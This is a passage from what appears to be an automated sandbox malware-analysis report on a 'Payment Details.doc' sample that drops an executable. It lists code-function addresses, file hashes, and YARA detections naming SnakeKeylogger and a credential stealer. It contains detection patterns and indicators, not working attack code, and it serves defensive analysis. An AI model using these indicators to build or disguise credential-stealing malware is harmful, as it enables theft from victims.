                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007187389_2_00718738
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00719F249_2_00719F24
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007165109_2_00716510
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071B7189_2_0071B718
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007125009_2_00712500
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071CF009_2_0071CF00
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007165009_2_00716500
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071B70A9_2_0071B70A
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00713BF89_2_00713BF8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071A3F89_2_0071A3F8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00710DF89_2_00710DF8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00717BF89_2_00717BF8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00718BFF9_2_00718BFF
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00715BE09_2_00715BE0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071BBE09_2_0071BBE0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071A3E79_2_0071A3E7
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00713BEA9_2_00713BEA
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00715BD19_2_00715BD1
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00711BD09_2_00711BD0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071BBD29_2_0071BBD2
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071D3C89_2_0071D3C8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071EBB09_2_0071EBB0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071D3B89_2_0071D3B8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007195A09_2_007195A0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071EBA69_2_0071EBA6
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007169A89_2_007169A8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007195949_2_00719594
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007129989_2_00712998
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007169989_2_00716998
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_007149809_2_00714980
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0071AD889_2_0071AD88
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B39A09_2_008B39A0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BA5E89_2_008BA5E8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B0E8B9_2_008B0E8B
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BCE889_2_008BCE88
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B26809_2_008B2680
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B0E989_2_008B0E98
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BEAA89_2_008BEAA8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BB8A89_2_008BB8A8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BD4C89_2_008BD4C8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B34D89_2_008B34D8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BF0D89_2_008BF0D8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BBEE89_2_008BBEE8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BF0E89_2_008BF0E8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BA8F99_2_008BA8F9
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B04F89_2_008B04F8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B1CF09_2_008B1CF0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BC2089_2_008BC208
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BF4089_2_008BF408
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B00069_2_008B0006
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B18189_2_008B1818
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BAC189_2_008BAC18
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B30109_2_008B3010
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BAC289_2_008BAC28
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B18289_2_008B1828
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BDE289_2_008BDE28
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BC8489_2_008BC848
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BFA489_2_008BFA48
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B00409_2_008B0040
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BB2689_2_008BB268
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B3E689_2_008B3E68
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BE4689_2_008BE468
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BE7889_2_008BE788
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BB5889_2_008BB588
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B399D9_2_008B399D
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BD1A89_2_008BD1A8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BD1A09_2_008BD1A0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B21B89_2_008B21B8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B9BB89_2_008B9BB8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BBBC89_2_008BBBC8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BEDC89_2_008BEDC8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B09C09_2_008B09C0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B09D09_2_008B09D0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BD7E89_2_008BD7E8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BDB089_2_008BDB08
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BA9089_2_008BA908
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B05089_2_008B0508
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BC5289_2_008BC528
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BF7289_2_008BF728
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BAF489_2_008BAF48
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B2B489_2_008B2B48
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BE1489_2_008BE148
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B134F9_2_008B134F
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BCB579_2_008BCB57
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008BCB689_2_008BCB68
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008B13609_2_008B1360
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D00409_2_008D0040
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D57889_2_008D5788
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DDE889_2_008DDE88
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D71889_2_008D7188
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DD1809_2_008DD180
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D4A809_2_008D4A80
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D64809_2_008D6480
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D7E9E9_2_008D7E9E
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D71989_2_008D7198
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D8B989_2_008D8B98
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D64909_2_008D6490
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DF2A89_2_008DF2A8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D8BA89_2_008D8BA8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D7EA09_2_008D7EA0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D98A29_2_008D98A2
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D34B99_2_008D34B9
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DBBB89_2_008DBBB8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D98B09_2_008D98B0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DAEB09_2_008DAEB0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D4ECE9_2_008D4ECE
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D34C89_2_008D34C8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DBBC89_2_008DBBC8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DC8C19_2_008DC8C1
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DAEC09_2_008DAEC0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D41C09_2_008D41C0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D4ED89_2_008D4ED8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DD5D89_2_008DD5D8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DFBD89_2_008DFBD8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D68DA9_2_008D68DA
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DC8D09_2_008DC8D0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D41D09_2_008D41D0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D5BD29_2_008D5BD2
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D68E89_2_008D68E8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D5BE09_2_008D5BE0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DE4E09_2_008DE4E0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D82F89_2_008D82F8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D75F09_2_008D75F0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D8FF09_2_008D8FF0
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D9D089_2_008D9D08
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DB3089_2_008DB308
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D90009_2_008D9000
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DB3189_2_008DB318
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D461A9_2_008D461A
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DEE109_2_008DEE10
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D39109_2_008D3910
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DC0109_2_008DC010
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D00129_2_008D0012
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DCD289_2_008DCD28
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D46289_2_008D4628
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D60289_2_008D6028
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D53269_2_008D5326
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DC0209_2_008DC020
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D39209_2_008D3920
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D7A3E9_2_008D7A3E
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D60389_2_008D6038
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DF7319_2_008DF731
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D53309_2_008D5330
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DDA309_2_008DDA30
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D6D309_2_008D6D30
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D7A489_2_008D7A48
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D94489_2_008D9448
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DF7409_2_008DF740
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D6D409_2_008D6D40
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D87409_2_008D8740
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D305F9_2_008D305F
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DAA599_2_008DAA59
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D94589_2_008D9458
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D87509_2_008D8750
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D3D699_2_008D3D69
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DAA689_2_008DAA68
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DC4689_2_008DC468
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DB7609_2_008DB760
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D3D789_2_008D3D78
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DC4789_2_008DC478
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DE9789_2_008DE978
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D57789_2_008D5778
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DDE789_2_008DDE78
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008DB7709_2_008DB770
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D30709_2_008D3070
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_008D4A709_2_008D4A70
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009457B89_2_009457B8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009450D89_2_009450D8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009449F89_2_009449F8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009443189_2_00944318
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00943C389_2_00943C38
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009435589_2_00943558
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009400409_2_00940040
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00942E789_2_00942E78
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009457A89_2_009457A8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00940ED89_2_00940ED8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009450C89_2_009450C8
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00942AF99_2_00942AF9
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009449E99_2_009449E9
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00942B009_2_00942B00
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009443089_2_00944308
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009421309_2_00942130
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_009421219_2_00942121
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00943C289_2_00943C28
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_0094354B9_2_0094354B
                Source: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exeCode function: 9_2_00942E689_2_00942E68
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\HgCppsoKmxQq[1].exe 516FFDB4EF149292E235BEA6B676674D973E52C3382FDD3C40F85245F9E564BA
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Roaming\ncfplgpeter20306.exe 516FFDB4EF149292E235BEA6B676674D973E52C3382FDD3C40F85245F9E564BA
                Source: Payment Details.doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.ncfplgpeter20306.exe.3362a30.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 9.2.ncfplgpeter20306.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 00000009.00000002.906972286.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000005.00000002.395781634.00000000032DE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000005.00000002.395781634.0000000003139000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: ncfplgpeter20306.exe PID: 3444, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: ncfplgpeter20306.exe PID: 3520, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: HgCppsoKmxQq[1].exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: ncfplgpeter20306.exe.2.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, COVID19.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
                Source: 5.2.ncfplgpeter20306.exe.31c8d18.8.raw.unpack, VIPSeassion.csCryptographic APIs: 'TransformFinalBlock'
